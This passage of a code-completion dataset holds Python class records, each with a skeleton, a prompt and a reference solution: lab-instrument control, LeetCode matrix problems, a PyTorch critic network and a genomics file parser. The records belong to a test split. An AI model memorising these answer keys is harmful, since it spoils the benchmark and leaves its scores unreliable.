\"\"\"Switch on/off the pulse modulation of the source.\"\"\"\n\n def check(self, *args, **kwargs):\n \"\"\"Validate the value of the switch.\"\"\"\n <|body_0|>\n\n def i_perform(self, switch=None):\n \"\"\"Default interface behavior.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\n if test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\n return (test, traceback)\n<|end_body_0|>\n\n<|body_start_1|>\n if switch is None:\n switch = self.format_and_eval_string(self.switch)\n if switch 
== 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\n else:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)\n<|end_body_1|>\n", "revision_id": "b6f1f5b236c7a4e28d9a3bc8da9820c52d789309", "skeleton": "<|skeleton|>\nclass SetPulseModulationTask:\n \"\"\"Switch on/off the pulse modulation of the source.\"\"\"\n\n def check(self, *args, **kwargs):\n \"\"\"Validate the value of the switch.\"\"\"\n <|body_0|>\n\n def i_perform(self, switch=None):\n \"\"\"Default interface behavior.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SetPulseModulationTask:\n \"\"\"Switch on/off the pulse modulation of the source.\"\"\"\n\n def check(self, *args, **kwargs):\n \"\"\"Validate the value of the switch.\"\"\"\n test, traceback = super(SetPulseModulationTask, self).check(*args, **kwargs)\n if test and self.switch:\n try:\n switch = self.format_and_eval_string(self.switch)\n except Exception:\n return (False, traceback)\n if switch not in ('Off', 'On', 0, 1):\n test = False\n traceback[self.get_error_path() + '-switch'] = '{} is not an acceptable value.'.format(self.switch)\n return (test, traceback)\n\n def i_perform(self, switch=None):\n \"\"\"Default interface behavior.\"\"\"\n if switch is None:\n switch = self.format_and_eval_string(self.switch)\n if switch == 'On' or switch == 1:\n self.driver.pm_state = 'On'\n self.write_in_database('pm_state', 1)\n else:\n self.driver.pm_state = 'Off'\n self.write_in_database('pm_state', 0)\n", "source": "the_stack_v2_python_sparse", "source_path": "exopy_hqc_legacy/tasks/tasks/instr/rf_tasks.py", "source_repo": "Exopy/exopy_hqc_legacy", "split": "test", "star_events_count": 0} {"blob_id": "bf1d9d057c085ad6297f2f0e7aa68370c76ff682", "bodies": ["rows = set()\ncolumns = set()\nfor i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\nfor row in rows:\n matrix[row] = [0] * len(matrix[0])\nfor column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0", "height = len(matrix)\nif height == 0:\n return\nwidth = len(matrix[0])\nfor i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\nfor i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0"], "bodies_text": "<|body_start_0|>\n rows = set()\n columns = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\n for row in rows:\n matrix[row] = [0] * len(matrix[0])\n for column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0\n<|end_body_0|>\n\n<|body_start_1|>\n height = len(matrix)\n if height == 0:\n return\n width = len(matrix[0])\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def setZeroes(self, 
matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_0|>\n\n def setZeroes_O1(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n rows = set()\n columns = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\n for row in rows:\n matrix[row] = [0] * len(matrix[0])\n for column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0\n<|end_body_0|>\n\n<|body_start_1|>\n height = len(matrix)\n if height == 0:\n return\n width = len(matrix[0])\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000059", "length_bytes": 1570, "license_type": "no_license", "methods": [{"docstring": ":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.", "name": "setZeroes", "signature": "def setZeroes(self, matrix)"}, {"docstring": ":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.", "name": "setZeroes_O1", "signature": "def setZeroes_O1(self, matrix)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def setZeroes(self, matrix): :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\n- def setZeroes_O1(self, matrix): :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def setZeroes(self, matrix): :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\n- def setZeroes_O1(self, matrix): :type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\n\n<|skeleton|>\nclass Solution:\n\n def setZeroes(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_0|>\n\n def setZeroes_O1(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n rows = set()\n columns = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\n for row in rows:\n matrix[row] = [0] * len(matrix[0])\n for column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0\n<|end_body_0|>\n\n<|body_start_1|>\n height = len(matrix)\n if height == 0:\n return\n width = len(matrix[0])\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n 
matrix[i][j] = 0\n<|end_body_1|>\n", "revision_id": "16e8a7935811fa71ce71998da8549e29ba68f847", "skeleton": "<|skeleton|>\nclass Solution:\n\n def setZeroes(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_0|>\n\n def setZeroes_O1(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def setZeroes(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n rows = set()\n columns = set()\n for i in range(len(matrix)):\n for j in range(len(matrix[0])):\n if matrix[i][j] == 0:\n rows.add(i)\n columns.add(j)\n for row in rows:\n matrix[row] = [0] * len(matrix[0])\n for column in columns:\n for row in range(len(matrix)):\n matrix[row][column] = 0\n\n def setZeroes_O1(self, matrix):\n \"\"\":type matrix: List[List[int]] :rtype: void Do not return anything, modify matrix in-place instead.\"\"\"\n height = len(matrix)\n if height == 0:\n return\n width = len(matrix[0])\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 0:\n for tmp in range(height):\n if matrix[tmp][j] != 0:\n matrix[tmp][j] = 'a'\n for tmp in range(width):\n if matrix[i][tmp] != 0:\n matrix[i][tmp] = 'a'\n for i in range(height):\n for j in range(width):\n if matrix[i][j] == 'a':\n matrix[i][j] = 0\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode4/setZeroes.py", "source_repo": "lizyang95/leetcode", "split": "test", "star_events_count": 0} {"blob_id": "c6ede396fad99534e4d0a7f6161c53c2b2640c5d", "bodies": ["super(Critic, self).__init__()\nself.state_dim = state_dim\nself.action_dim = action_dim\nself.hidden = 128\nself.usecuda = usecuda\nself.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\nself.fcs1 = nn.Linear(self.hidden, 1)\nself.fcs1.weight.data.uniform_(-EPS, EPS)\nself.fca1 = nn.Linear(self.action_dim, 1)\nself.fca1.weight.data.uniform_(-EPS, EPS)\nreturn", "h = torch.zeros(batch_size, self.hidden)\nc = torch.zeros(batch_size, self.hidden)\nif self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\nreturn (h, c)", "action = action.view(-1, 1)\nx = state.permute(0, 2, 1)\ns = self.zero_state(state.size(0))\nfor t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\nreturn self.fcs1(s[0]) + self.fca1(action)"], "bodies_text": "<|body_start_0|>\n super(Critic, self).__init__()\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.hidden = 128\n self.usecuda = usecuda\n self.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\n self.fcs1 = nn.Linear(self.hidden, 1)\n self.fcs1.weight.data.uniform_(-EPS, EPS)\n self.fca1 = nn.Linear(self.action_dim, 1)\n self.fca1.weight.data.uniform_(-EPS, EPS)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n h = torch.zeros(batch_size, self.hidden)\n c = torch.zeros(batch_size, self.hidden)\n if self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\n return (h, c)\n<|end_body_1|>\n\n<|body_start_2|>\n action = action.view(-1, 1)\n x = state.permute(0, 2, 1)\n s = self.zero_state(state.size(0))\n for t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\n return self.fcs1(s[0]) + self.fca1(action)\n<|end_body_2|>\n", "class_docstring": "Critic network", "class_name": "Critic", 
"detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Critic:\n \"\"\"Critic network\"\"\"\n\n def __init__(self, state_dim, action_dim, usecuda=False):\n \"\"\"Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\"\"\"\n <|body_0|>\n\n def zero_state(self, batch_size):\n \"\"\"Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\"\"\"\n <|body_1|>\n\n def forward(self, state, action):\n \"\"\"Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Critic, self).__init__()\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.hidden = 128\n self.usecuda = usecuda\n self.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\n self.fcs1 = nn.Linear(self.hidden, 1)\n self.fcs1.weight.data.uniform_(-EPS, EPS)\n self.fca1 = nn.Linear(self.action_dim, 1)\n self.fca1.weight.data.uniform_(-EPS, EPS)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n h = torch.zeros(batch_size, self.hidden)\n c = torch.zeros(batch_size, self.hidden)\n if self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\n return (h, c)\n<|end_body_1|>\n\n<|body_start_2|>\n action = action.view(-1, 1)\n x = state.permute(0, 2, 1)\n s = self.zero_state(state.size(0))\n for t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\n return self.fcs1(s[0]) + self.fca1(action)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000060", "length_bytes": 3704, "license_type": "permissive", "methods": [{"docstring": "Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.", "name": "__init__", "signature": "def __init__(self, state_dim, action_dim, usecuda=False)"}, {"docstring": "Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.", "name": "zero_state", "signature": "def zero_state(self, batch_size)"}, {"docstring": "Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.", "name": "forward", "signature": "def forward(self, state, action)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005194", "prompt": "Implement the Python class `Critic` described below.\n\nClass description:\nCritic network\n\nMethod signatures and docstrings:\n- def __init__(self, state_dim, action_dim, usecuda=False): Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\n- def zero_state(self, batch_size): Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. 
:rtype: list of torch tensors.\n- def forward(self, state, action): Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.", "prompted_full_text": "Implement the Python class `Critic` described below.\n\nClass description:\nCritic network\n\nMethod signatures and docstrings:\n- def __init__(self, state_dim, action_dim, usecuda=False): Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\n- def zero_state(self, batch_size): Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\n- def forward(self, state, action): Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\n\n<|skeleton|>\nclass Critic:\n \"\"\"Critic network\"\"\"\n\n def __init__(self, state_dim, action_dim, usecuda=False):\n \"\"\"Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\"\"\"\n <|body_0|>\n\n def zero_state(self, batch_size):\n \"\"\"Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\"\"\"\n <|body_1|>\n\n def forward(self, state, action):\n \"\"\"Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(Critic, self).__init__()\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.hidden = 128\n self.usecuda = usecuda\n self.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\n self.fcs1 = nn.Linear(self.hidden, 1)\n self.fcs1.weight.data.uniform_(-EPS, EPS)\n self.fca1 = nn.Linear(self.action_dim, 1)\n self.fca1.weight.data.uniform_(-EPS, EPS)\n return\n<|end_body_0|>\n\n<|body_start_1|>\n h = torch.zeros(batch_size, self.hidden)\n c = torch.zeros(batch_size, self.hidden)\n if self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\n return (h, c)\n<|end_body_1|>\n\n<|body_start_2|>\n action = action.view(-1, 1)\n x = state.permute(0, 2, 1)\n s = self.zero_state(state.size(0))\n for t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\n return self.fcs1(s[0]) + self.fca1(action)\n<|end_body_2|>\n", "revision_id": "a02bdb1754e9bae1c2448e4bccec795c739b3e6f", "skeleton": "<|skeleton|>\nclass Critic:\n \"\"\"Critic network\"\"\"\n\n def __init__(self, state_dim, action_dim, usecuda=False):\n \"\"\"Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\"\"\"\n <|body_0|>\n\n def zero_state(self, batch_size):\n \"\"\"Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. 
:rtype: list of torch tensors.\"\"\"\n <|body_1|>\n\n def forward(self, state, action):\n \"\"\"Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. :return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Critic:\n \"\"\"Critic network\"\"\"\n\n def __init__(self, state_dim, action_dim, usecuda=False):\n \"\"\"Special method for class initialisation. :param state_dim: Dimension of input state. :type state_dim: int. :param action_dim: Dimension of input action. :type action_dim: int.\"\"\"\n super(Critic, self).__init__()\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.hidden = 128\n self.usecuda = usecuda\n self.rnn = nn.LSTMCell(self.state_dim, self.hidden, bias=True)\n self.fcs1 = nn.Linear(self.hidden, 1)\n self.fcs1.weight.data.uniform_(-EPS, EPS)\n self.fca1 = nn.Linear(self.action_dim, 1)\n self.fca1.weight.data.uniform_(-EPS, EPS)\n return\n\n def zero_state(self, batch_size):\n \"\"\"Returns the initial network state. :param batch_size: the size of the current batch. :type batch_size: int. :return: the initial network state. :rtype: list of torch tensors.\"\"\"\n h = torch.zeros(batch_size, self.hidden)\n c = torch.zeros(batch_size, self.hidden)\n if self.usecuda and torch.cuda.is_available():\n h = h.cuda()\n c = c.cuda()\n return (h, c)\n\n def forward(self, state, action):\n \"\"\"Returns Value function Q(s,a) obtained from critic network. :param state: Input state. :type state: torch tensor. :param action: Input Action. :type action: Torch tensor. 
:return: Value function Q(S,a) [m, 1] :rtype: Torch Variable.\"\"\"\n action = action.view(-1, 1)\n x = state.permute(0, 2, 1)\n s = self.zero_state(state.size(0))\n for t in range(x.size(2)):\n s = self.rnn(x[:, :, t], s)\n return self.fcs1(s[0]) + self.fca1(action)\n", "source": "the_stack_v2_python_sparse", "source_path": "notebook/njord-ddpg/model.py", "source_repo": "LUOFENGZHOU/njord", "split": "test", "star_events_count": 0} {"blob_id": "0f3e18a6db60a54ee705e25d88090299b13cadc2", "bodies": ["tok = line.strip().split()\nassert len(tok) == 10\nassert tok[0] == 'sugar:'\nself.uid = uid\nself.qid = tok[1]\nself.qstart = int(tok[2])\nself.qend = int(tok[3])\nself.qstrand = tok[4]\nself.sid = tok[5]\nself.sstart = int(tok[6])\nself.send = int(tok[7])\nself.sstrand = tok[8]\nself.score = int(tok[9])\nself.lines = []", "tok = line.strip().split('\\t')[:8]\nif tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\nelif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\nelif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)"], "bodies_text": "<|body_start_0|>\n tok = line.strip().split()\n assert len(tok) == 10\n assert tok[0] == 'sugar:'\n self.uid = uid\n self.qid = tok[1]\n self.qstart = int(tok[2])\n self.qend = int(tok[3])\n self.qstrand = tok[4]\n self.sid = tok[5]\n self.sstart = int(tok[6])\n self.send = int(tok[7])\n self.sstrand = tok[8]\n self.score = int(tok[9])\n self.lines = []\n<|end_body_0|>\n\n<|body_start_1|>\n tok = line.strip().split('\\t')[:8]\n if tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\n elif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n elif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "exoneratehit", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass exoneratehit:\n\n def __init__(self, line, uid):\n \"\"\"parse SUGAR hit from a line\"\"\"\n <|body_0|>\n\n def append(self, line, uid):\n \"\"\"append a gff line to the result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tok = line.strip().split()\n assert len(tok) == 10\n assert tok[0] == 'sugar:'\n self.uid = uid\n self.qid = tok[1]\n self.qstart = int(tok[2])\n self.qend = int(tok[3])\n self.qstrand = tok[4]\n self.sid = tok[5]\n self.sstart = int(tok[6])\n self.send = int(tok[7])\n self.sstrand = tok[8]\n self.score = int(tok[9])\n self.lines = []\n<|end_body_0|>\n\n<|body_start_1|>\n tok = line.strip().split('\\t')[:8]\n if tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\n elif tok[2] == 
'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n elif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000061", "length_bytes": 11936, "license_type": "no_license", "methods": [{"docstring": "parse SUGAR hit from a line", "name": "__init__", "signature": "def __init__(self, line, uid)"}, {"docstring": "append a gff line to the result", "name": "append", "signature": "def append(self, line, uid)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002053", "prompt": "Implement the Python class `exoneratehit` described below.\n\nClass description:\nImplement the exoneratehit class.\n\nMethod signatures and docstrings:\n- def __init__(self, line, uid): parse SUGAR hit from a line\n- def append(self, line, uid): append a gff line to the result", "prompted_full_text": "Implement the Python class `exoneratehit` described below.\n\nClass description:\nImplement the exoneratehit class.\n\nMethod signatures and docstrings:\n- def __init__(self, line, uid): parse SUGAR hit from a line\n- def append(self, line, uid): append a gff line to the result\n\n<|skeleton|>\nclass exoneratehit:\n\n def __init__(self, line, uid):\n \"\"\"parse SUGAR hit from a line\"\"\"\n <|body_0|>\n\n def append(self, line, uid):\n \"\"\"append a gff line to the result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n tok = line.strip().split()\n assert len(tok) == 10\n assert tok[0] == 'sugar:'\n self.uid = uid\n self.qid = tok[1]\n self.qstart = int(tok[2])\n self.qend = int(tok[3])\n self.qstrand = tok[4]\n self.sid = tok[5]\n self.sstart = int(tok[6])\n self.send = int(tok[7])\n self.sstrand = tok[8]\n self.score = int(tok[9])\n self.lines = []\n<|end_body_0|>\n\n<|body_start_1|>\n tok = line.strip().split('\\t')[:8]\n if tok[2] == 'gene':\n tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\n elif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n elif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n<|end_body_1|>\n", "revision_id": "e006354ce41e6db029fb8cda02efaae60afc5327", "skeleton": "<|skeleton|>\nclass exoneratehit:\n\n def __init__(self, line, uid):\n \"\"\"parse SUGAR hit from a line\"\"\"\n <|body_0|>\n\n def append(self, line, uid):\n \"\"\"append a gff line to the result\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class exoneratehit:\n def __init__(self, line, uid):\n \"\"\"parse SUGAR hit from a line\"\"\"\n tok = line.strip().split()\n assert len(tok) == 10\n assert tok[0] == 'sugar:'\n self.uid = uid\n self.qid = tok[1]\n self.qstart = int(tok[2])\n self.qend = int(tok[3])\n self.qstrand = tok[4]\n self.sid = tok[5]\n self.sstart = int(tok[6])\n self.send = int(tok[7])\n self.sstrand = tok[8]\n self.score = int(tok[9])\n self.lines = []\n\n def append(self, line, uid):\n \"\"\"append a gff line to the result\"\"\"\n tok = line.strip().split('\\t')[:8]\n if tok[2] == 'gene':\n 
tok.append('ID=%s_%d;Name=%s(%d)' % (self.qid, self.uid, self.qid, self.score))\n self.lines.append(tok)\n tok = tok[:]\n tok[2] = 'mRNA'\n tok[8] = 'ID=mRNA_%s_%d;Parent=%s_%d' % (self.qid, self.uid, self.qid, self.uid)\n self.lines.append(tok)\n elif tok[2] == 'exon':\n tok.append('ID=exon_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n elif tok[2] == 'cds':\n tok[2] = 'CDS'\n tok.append('ID=CDS_%s_%d;Parent=mRNA_%s_%d' % (self.qid, uid, self.qid, self.uid))\n self.lines.append(tok)\n", "source": "the_stack_v2_python_sparse", "source_path": "seq.py", "source_repo": "robertvi/rjvbio", "split": "test", "star_events_count": 0} {"blob_id": "1b359b11eba1efb9e4f787f074d9e7165a756920", "bodies": ["self.matrix = matrix\nrow = len(matrix)\nif row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix", "if not self.matrix:\n return 0\nif row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\nif row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\nif col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\nreturn self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]"], "bodies_text": "<|body_start_0|>\n self.matrix = matrix\n row = len(matrix)\n if row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.matrix:\n return 0\n if row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\n if row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\n if col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "NumMatrix", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. 
